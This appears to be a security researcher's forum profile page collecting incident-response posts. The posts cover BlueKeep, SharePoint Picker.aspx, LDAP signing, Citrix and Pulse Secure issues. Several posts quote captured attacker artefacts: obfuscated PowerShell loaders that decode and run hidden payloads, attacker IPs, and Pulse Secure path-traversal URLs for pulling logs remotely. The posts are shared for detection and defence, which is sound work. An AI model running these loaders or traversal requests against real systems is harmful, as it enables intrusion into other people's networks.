Jump to content
OpenSecurity.global

Kevin Beaumont

Members
  • Content Count

    228
  • Joined

  • Last visited

  • Days Won

    32
  • Invited by

    DarkOverlord

Posts posted by Kevin Beaumont


  1. Seeing some minor variation of BlueKeep attack behaviour (maybe attackers updated Metasploit finally), I'm seeing some stable'ish exploitation of Windows 7 this week however they're failing to run commands properly.  Example commands;

    Quote
    CommandLine
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "( [runtiMe.IntErOPServicEs.mARSHaL]::([rUnTIMe.INteroPSErvIcEs.MarShal].Getmembers()[2].nAMe).iNVOKE( [runTiMe.inTErOPSerVicEs.MArshAL]::sEcURESTRiNGToglOBAlALloCUnIcOde( $('76492d1116743f0423413b16050a5345MgB8AEcANQBDAEEANQB0AHIAZgB2AGgAaABnAFcAbgAzAFMANwB6AHEAZwBNAGcAPQA9AHwAMgBkADIAZQAyADgAOQA2ADUANABlADgANAA1ADYAMQBjADcAZAAxADIAMgAxAGUANgAwAGYAYQBmADQAZQA0AGIANAA0ADgAMABkAGMAYQAzAGQAMAAwAGIAZQAwAGIANwA2AGQANQA5AGEAMQA1ADkAMABiAGUAYgBmADUAYwA2ADYAOAAyADkANwA0AGQAMQBlAGUAMAAwADYANgAzAGQAYwA1ADMAYQBhADUANwBiADcAZgBkAGMAZABhADkAYQAxAGUAYgBmAGYAMABhAGQANQA0AGMAMAAyADcAMQAzAGUANwA1ADUAOQBiADkAMQBiADIAOQA1ADAAMwAyADQAZgBmADgANABhAGYAOQA3AGYAMwA5ADQANQA1ADIANABlADkANgBiADMAYwA5AGIAMwAxADUAOQAwAGYANgA1AGMANQBlADAAOQBhADQAYgBkADYAMwA3AGMANwA3ADgANQBlADQAMgBiADMANwA2AGIANABiADAANwAyADYAOABkADUANwBmADcAZQBlADkANgBkADkAZgA3ADcANQAyADkAMABlAGEAMAA1ADEAYQBjADgAOQAyADMANgBmAGEANQA2ADMAOQA4AGQANABlADkAZQBjADgAMQA0ADgAZQAyAGQAYQA4ADUANwBhAGYANwA2ADIAOAA4ADUANAAwAGMAZQA1ADMAOABjAGMAZgBlADAAMwAwADMANwAwAGYANQAwADUAMwBjADkANgA3ADAAYwA0ADYAMABjAGYAMQBhAGYAMQBjADYAYwA0AGUAZgBiADQAMwBhAGQAYQA0AGUAZQBhADUAYwAxADgAMQA2AGQAOQAzADMANAA1AGEANwA1ADYAMAA1ADIANAAxAGMANQAwADkAYgBlADcAOABkAGMAMgBlADQAZgAzADYAMAAxAGEAMQA4ADcANwAzAGEAMABlADkANgA3ADgANQBmAGIAOABmADgAMgAwADgAZgBiAGMANgBhAGIANgA3AGEANQBkADgAOAA1AGYAMwAxADAAYgBhAGMAZABiADUAOABhAGMAMQAwADUAYQA2AGIAZgA1AGYAMwBjADgAYQBkADcAOQAzADQAOAA3ADUAMwA2AGEAZABkADgANAA0ADAAOAA5ADEANQAwADQAOQBiAGIANwAzADMAZAA4ADIAMwAwAGMAMABiADQAZABhADgAYwBkAGEAYQBlAGQAMAAyADAANgAwADIANQBkAGQAYgAwAGYAMQBmADEAZgA2AGUANgA4AGUAMQBmAGIAMgBlADkAMgBmAGQAMgAwAGYANgA0ADYANgBkADYAZgA2ADAAOABkAGIAZABkADcAZQA1ADgAMQA1ADEAZQBhAGQAOQAyADIANwAxAGQAZQBjADUAMgAyADgAMQA0ADQANQAyADkAZgBmADcAMQBmADAAZQA0AGUAMwAyAGEAOABlADcANgBlADIAMgA1AGMANgBjADEANgAxADEAZgA0AGIANgBlAGIANQBmADgAYQA0ADgAOQBhADEAZgBjADgANQA0AGQANAA2ADgAYQA5ADAAZgA3ADMAMQBlADYAZgBmAGQANABhADgAZgBlAGIAMwAyAGMAOQA1AGEAZABmAGEAYwA5ADgANgA1ADQAMgA1AGIAOQA3ADUANgBhADIAMAA4ADEAYwAxAGYAZQBlADUAOQBmADcANQBhADMANwBmADAAMgBlAGMAOQBlADEAYgA3ADkANwBhADIAYwA0ADAAZgA4ADIAMwA3ADkAYQA2ADEANgBjADMAZQBmAGUAYQBiADAANQBhAGMAOAAyAGEAZQA1ADMAZAAyADkAZQBjADcAOQAwADkAYQBlAGMAMABiAGEAOQBmAGIAYwA3ADAAOQAyADQAOABhAGMAOAA4AGQAMQA1ADMAMAA0AGUAOQBkAGIAYwBjAGUANQAwADUAMgA1ADYAMwA5ADYAYgA3AGMAMQBhADcAMwBkADgANQBkAGUANgBiADMAYgBkAGIAZQA4ADYAMQAwAGIAMwAxAGYAMQBjADIANgAyAGEAYgA3ADMANAAzAGUAYQBkAGQAMgA0ADEAYQA1ADgAYQA3AGIANwA5ADEANABmADcAZQA3AGQAOAA0ADUAZgBkADcANgAzADIAMgBhADIAZAA5AGQAOQA4ADEAYwA5AGQANwA5ADgAMAAyAGIAOQAwAGQAZQA4ADEAMQBiADUAYQBlADkAZgBjADgAMwBiADYANwBhADQAOAAyAGQANQA2ADMANgA3AGEANAA0AGMAMQBmADkAMAA0AGYAMQA4ADAAYgA3ADgAYQA3ADcAMAA2ADQAMQBkAGMANwBiADAAYwA0ADAAYgA5ADgAYgAyAGEAMwA5AGUAMAA1AGYAMwAzADgANwBhADMAMQBhAGEAMAAwAGYAOQBiADcAMwBlAGQANgBjADgAOQA0ADEAZQBlADIAZAAxAGEAZgA5AGQAMwAyAGYAMAA3AGEAMQAzADUANQBlAGYAMQBkADEAOQA3ADYAYwBlAGIAZgA1AGIAZQBhADIAYwAzADEAZQBkADkAMwA3AGYAMABjADYAYwAwAGYAYwBlADMAZgAxADUAYQBmAGUAZQBjAGIAOQBiADAAZABiAGQAMwBhAGQAYwBkADQAMQBiADAANQBjADIAZQAwADQAOQA3AGIAYgA5ADMAOQA5ADYAZgAzAGIAZAAwADEAMAA1AGYAMgA5AGUAYwBhAGIANAA0ADIAMwAxAGQAZgAwAGUAZAA4ADgAYgBjAGEAOQBjAGYAZQBiADYANQBjADYANwAzAGQAOQA1ADgANwA4AGMAOQAzAGQAYwA0ADYAYwA5ADIAZAAyAGIAMgBmAGYANAA2ADEAYQAyAGEAYwAyADgAYQA0AGIAZgA0ADYAYwBlAGQAMwAxADAAOAAyAGMAOAA4ADgAYgBlADIAMQA2AGYANQA3AGQAMwBmAGEANwA4AGEANwBlAGIAMQAxADcANwBlAGUANwBhADYAZAA2ADMAMwA1AGMANQBlAGQANgA2ADYANQAyADcANABkADUAZABjADkAOQAyADkAMgA4AGIAMQBiADkAOQBhAGUAZQAwADMAYgBlADEAZgBkAGEAOAA4AGQAMQA5AGIAYQA2AGYAMQA4AGIAYwA0ADYAYQA0ADEANwAyADMAYwBiAGYAOAAwADIANAA1ADcAZgA4AGMAZABlAGMAYgBjADgANAA4ADEAZgBhADEAYgAzAGEAYQAxAGQAOABhAGQAOQA2AGYAYgA4AGEANAAwAGIAOAA3AGUAOAA3ADkAMABhADUAYwAzAGUAOQAxADMAOAA4AGYAZQA1ADIAZQA0AGQAYgBlAGIANgAwAGQANwA0AGIAMwA4ADgANwA3AGIAMgAxADkAMwAxAGQAYwA1ADUAMgBjADEAZgBlADYANwAzADAAMQA0ADUANgBiAGIANQA1AGUAMABlADEAOAA3AGEANwBlADQAYwA4AGEAZgA5ADkAZgBkADYAZgAyADMANQBiADYANwA5AGEAMwAxADgAYQBmADQANQAxAGEANgAyADIAOQA5AGQAYQAzADQAMQA1AGYANABmADAAMQA0ADIAOQBjADEAYQA2ADQAYQBkADQAMABlADIANABkADAAMAA3ADQANQA5ADcAYgBmAGUAOABlAGUAMQA3AGMAYwA2ADIAZQAwADQANgBlADUAMwBmADkAMwBlAGEANwBmADQAYgAwADkAYwA5ADkAYgBkADUAZQA4ADAAMwBlADYANQA2ADgANQBkAGYAYgBiADkAYwA0ADUAMABhADMAOABiADgAMAAxADMAYgA5ADkAOQAxADQANQAzAGIANQBhAGUAMQBkAGYAYQA5ADYAZQA5ADUAMwAwAGIAYwBjADQAZABhADEAYgA3AGQAZQBkADAAYQA5ADUAYwA3ADIAZABiADcAMQA3ADcAZQA4ADQANQBjADkANQBiADcAZgA3ADEAMgA4ADAANgBmADEAZQBiAGQAMgBjADMAYwA3ADAAYQBjADkAZgBlAGMANABiADcAYwAxAGIANAA1AGYAOABiADEAYQAxAGQAOABkADQAMQAwADIAMgA4ADMAZgBlADEANwA2ADcANgBhAGMAZQA2ADQAZAA2AGQAOABkADIAMQA0AGIAMgBmADEAMQA2AGMAOQA4AGEANQAzADIANgA2ADgAYgBmADQAYQBmAGYANQA2ADcANQA5ADgANQA3AGUAZQAxAGIAZAA1ADAAYwA0AGUAYwA1ADYAZAA5AGQAYgAxAGUANABjADUAOQAyADIAOAAyADQANgAwADQANgAzADIAYgA4ADMAOQA5ADgANwBhAGUAYwA4AGEAMgAxADEAZAAxAGEAYwA3ADkAYgAwADAANwBmADUAMQA2AGEAMABmADMAZQA3ADMANQA2AGUAOAA1ADAAOQA5ADYANwAxADcAZgAxAGYANAA5AGIANAAzADQANQA0ADEAOAA0ADkAOABiADYANAAxAGEAYgAwAGYAMQA1ADcAMQBhADQAMQAxADEAZQAxAGYAOABlADgAMgBhADYAZgAwAGYAMgBmADkAMwA0AGUAYgBmAGIAYwAyADAAZQAyADMAMABkAGIAMwA5AGYAMAA1ADIAYQA5ADYAYwA1ADcAOAAxAGIAOABkADIAYQBjADgAYQBlAGIAMgA1ADgAZAA3ADEAMgBmADMAOAA0ADAAMwBkAGIAMQA5AGEANAA4AGYANwA1ADMAYQA1AGYAZQAxADgANgA1AGQANQA3AGUAYgBkAGEAYQAyADQAOAAxADUAYQBjAGIANgBiAGUANwAxAGYAYgAzAGIANwBlAGYAZQAzADIANwBiADIANAAyADMAZAAwADkAMgA3ADIAOQBmADIAZAA5ADIAMAAzADgAZQA2ADAANAA1ADEAYgA4ADAAZQA2ADIAMgBjAGQAYQAzAGEAZgBiADAAZgA2ADQAMAA1AGYAYQAzAGEAMgAwAGEAZgBhAGIAZgBjAGMAYQA0ADUAMwBmADYAOAAyAGEANAA3ADUANgAyADQAYwA3ADUAMQBkADcAYgA0AGQAYwA4AGYAMAA1ADgAZAA3AGYANAAzAGQAYwA3ADUANQA3ADcAMQAwADgANwAwAGQANQA0ADUAMQA0ADAAZAA0ADgAOQA0ADUAYwA0AGMAMQBmAGYANQA3ADYAZgAxAGQAYQBkAGUAZQBmADcAMAA5ADcAOQAzAGYANgAxADAAZgAzAGUAZQBmADIAZAA4ADcAMQBmADgAMgBiAGUANAAxAGIAOQAzADkAYwBjAGIAYQBlADAAMQA3AGQANgA3AGYAZAAxADYAYwBkADYAYwA5ADMANQA0AGIAMgA1ADMANwA0ADUAZAAwAGEAMABhADMAOAAyAGUAMABlADIAMABiADcANAAwADEAZABjAGEAOAA1ADMAOQA5ADYAZgBmADIAYQA5ADMANABlADgAZgBhAGEAYQAxAGQAMgA4ADgAZQAwADQAMABkAGUAMABiADQAMgA2ADgANQBiADQAMABjAGIAMwA0AGUAMQBkAGYAMQBkAGEAYgA3AGMAZQA3ADAAMAA3ADcAOAA2ADEAZQAyAGIANAA5ADQANgA2ADgAZQBmAGEAMgA1ADcANQA4ADIAZQA5AGYAMABmADgANAA1ADUAYwBjADcAZQA4ADIAYwA0AGIAOQAxAA==' | COnvERtTO-secureSTriNg -k 233,15,104,145,89,224,141,140,14,129,234,189,3,99,170,12,187,51,142,37,87,56,187,247,167,194,37,235,247,182,23,164) )))|&( $eNV:COMSpEc[4,24,25]-jOin'')"
    Quote
    CommandLine
    powershell -w hiDDeN (NeW-obJeCt Io.COmPRessioN.dEFLatesTREAM([sySteM.Io.MEMoRYstREAM][SySTeM.COnveRt]::FroMBase64STRiNG('NY5PT4NAFMS/CgeS0kOX1lC0NL1I1ZPVpP45EA/LMpZXt2/J8pQmxu/ukuicJvObTKbaQdQe/osMHh2x3GvWB/i3ohhT+BJe6J2MFrxoS40Wclxqa2ttPqJN9B2L/8TPOu42SfWEs6gbNq4hPoSJZ6bgoe4ge/EhS5KqdBxmJdBb707Xukee/cMdhtlDfYSRaPz1irq0BJap2rqBrdPNX3PSinR9kaaXVyrL1eIiU/mqWMznq2VK3OCsWjnZyXTUunMDfN/C2ijufgE=' ), [systEm.io.comprESSion.ComPRESsIonmOdE]::decoMprESS ) |FoREAch { NeW-obJeCt iO.STrEamReaDer( $_, [Text.eNcoDiNg]::aScii )} ).rEAdtoENd( )| invokE-EXpREsSiOn

    Additional IoCs.  Application event 1000, spawning Powershell.exe:

    image.png.f3420f9706e599369153d82649dd2d55.png

    This event spawns from C:\Windows\system32\UI0Detect.exe and UI0Detect.exe 224 (224 is the parameter).

    spoolsv.exe crash:

    image.png.3a85440e3074435434f6dd2fac3a2716.png

     

    They check the device has more than 3.5gb of RAM, and is 64 bit, then try running a payload.

    image.png.77fd2d4159629c2866c4171ba5195936.png

    Network IOC 78.46.124.69 port 10095


  2. So I saw some exploitation of this in wild yesterday, looks like:

    Quote

    GET /_layouts/15/Picker.aspx - 80 - 84.16.244.47 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 200 0 0 359
    GET /_layouts/15/Picker.aspx PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=15.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c 80 - 84.16.244.47 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 200 0 0 312
    POST /_layouts/15/Picker.aspx PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=15.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c 80 - 84.16.244.47 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 200 0 0 1312
    GET /_layouts/Picker.aspx - 80 - 82.102.21.249 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 302 0 0 46
    GET /_layouts/15/Picker.aspx - 80 - 82.102.21.249 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 200 0 0 374
    GET /_layouts/15/Picker.aspx - 80 - 82.102.21.249 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 200 0 0 31
    GET /_layouts/Picker.aspx PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=15.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c 80 - 82.102.21.249 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 302 0 0 281
    GET /_layouts/15/Picker.aspx PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=15.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c 80 - 82.102.21.249 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 200 0 0 421
    GET /_layouts/15/Picker.aspx PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=15.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c 80 - 82.102.21.249 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 200 0 0 578
    POST /_layouts/15/Picker.aspx PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=15.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c 80 - 82.102.21.249 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 200 0 0 468
    GET /_layouts/15/downloadexternaldata.aspx - 80 - 82.102.21.249 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 401 0 0 10578
    POST /_layouts/Picker.aspx PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=15.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c 80 - 82.102.21.249 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 200 0 0 8984
    GET /_layouts/15/downloadexternaldata.aspx PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=15.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c 80 - 82.102.21.249 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 401 0 0 93
    POST /_layouts/15/downloadexternaldata.aspx PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=15.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c 80 - 82.102.21.249 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 401 0 0 124

    Obviously the POST statements aren't there.

    Triggers code execution like this:

    image.thumb.png.061734e76cad7e208cb0f65cbbbd8925.png


  3. In March this year, Microsoft plan to change LDAP (an authentication system) behaviour so you are required to make connections which is signed and basically secure.  If you have systems which authenticate with Active Directory in an insecure way, they will break post update.

    More info here:

    https://support.microsoft.com/en-us/help/4520412/2020-ldap-channel-binding-and-ldap-signing-requirement-for-windows

    https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV190023

    This is a big change which may have production impacts, i.e. systems may break.

    How to identify systems which will break

    Go to your domain controllers and look for Event ID 2887:

    Product: Windows Operating System
    ID: 2887
    Source: Microsoft-Windows-ActiveDirectory_DomainService
    Message: During the previous 24 hour period, some clients attempted to perform LDAP binds that were either:
    (1) A SASL (Negotiate, Kerberos, NTLM, or Digest) LDAP bind that did not request signing (integrity validation), or
    (2) A LDAP simple bind that was performed on a cleartext (non-SSL/TLS-encrypted) connection

    If you see this error, you need to take action as something will break.

    You can manually enable LDAP interface event logging, and afterwards Event ID 2889 will be logged in same location with the IP addresses of clients using insecure LDAP.

    On each DC:

    # Enable Simple LDAP Bind Logging 
    Reg Add HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Diagnostics /v "16 LDAP Interface Events" /t REG_DWORD /d 2
    

    This will get you the IP address of systems using insecure LDAP.. the next issue is to get them to... not do that.  Over to you!

    • Like 3

  4. The boilerplate description

    "A vulnerability has been identified in Citrix Application Delivery Controller (ADC) formerly known as NetScaler ADC and Citrix Gateway formerly known as NetScaler Gateway that, if exploited, could allow an unauthenticated attacker to perform arbitrary code execution."

    What it means in practice

    Unauthenticated remote code execution on internet connected Citrix Gateway devices = bad.

    Are attackers actually exploiting this vulnerability?

    Yes, at scale, against targeted and untargeted assets.

    Impact

    Lame stuff like coin miners, but also devices getting backdoored, and people trying to use this to deploy ransomware inside Windows orgs behind the Citrix boxes.

    Vendor advisory and patches

    Here: https://support.citrix.com/article/CTX267027

    Checking if your device has already been exploited

    Check out this tool, which is getting frequent updates: https://github.com/fireeye/ioc-scanner-CVE-2019-19781/tree/v1.2

    Scale of the issue

    Somewhere in the region of ~100k devices were exploitable with this back in December.  After have a huge awareness campaign via all sorts of orgs, this one is about ~10k unpatched devices at present.  Those orgs are still in serious danger of exploitation.

    If you patched late

    You want to run the FireEye tool linked above to look for exploitation, as attackers may have backdoored your device.

    I just applied the mitigations

    You should also apply the patch, as it hardens the setup - just the mitigations alone present some issues.


  5. On 9/18/2019 at 10:35 PM, Steve Walsh said:

    Cheers guys. My org recently had a sextortion attack. Used 1647 unique outlook address with a PDF attached which was password protected. The name of the PDF was the name of previously used password and contained within psf was usual sextortion bullshit with a link to a wallet. All mails involved were in have I been pwned. So I'd like to connect with the API to do password audits.

    That probably isn’t the use cases for HIBP, eg they don’t provide passwords. 


  6. I did a PoC with it at Crabbers back in 2016, but didn't reach the pentesting phase I'm afraid.  I aborted out of it for cost reasons more than anything, and at the time the product functionality wasn't very broad (I bet it has improved a lot since).

    With Windows 10 nowadays it has lots of exploit protection built in, e.g. at current jobbing we have all the different exploit prevention technology turned on with Group Policy in Windows 10 pilot:

    image.thumb.png.0ac9bcebdb2a39323b52e7fa07b9667b.png


  7. Some logs you can retrieve with this remotely:

    • https://host/dana-na/../dana/html5acc/guacamole/../../../../../../data/runtime/logs/log.admin.vc0?/dana/html5acc/guacamole/
    • https://host/dana-na/../dana/html5acc/guacamole/../../../../../../data/runtime/logs/log.access.vc0?/dana/html5acc/guacamole/

    As an attacker you can use these to figure out to some degree if the box has been tampered with already.

    Note that to have a hope of figuring out exactly what attackers tampered with, you need to manually (it is disabled by default) enable "Unauthenticated Web Requests" logging under System -> Logs/Monitoring in the Pulse Secure admin centre.  As a result of this many orgs compromised before they installed the patch will not realise if attackers have created backdoors, and they may still be compromised.  I recommend turning on logging, and looking at the admin logs - it won't catch everything (because HTTP requests aren't logged) but you might find other signs of tampering.

    Shoutout to Alyssa Herrera who continues to figure out this vulnerability.

×
×
  • Create New...

Important Information

We use cookies as we're cookie monsters. Privacy Policy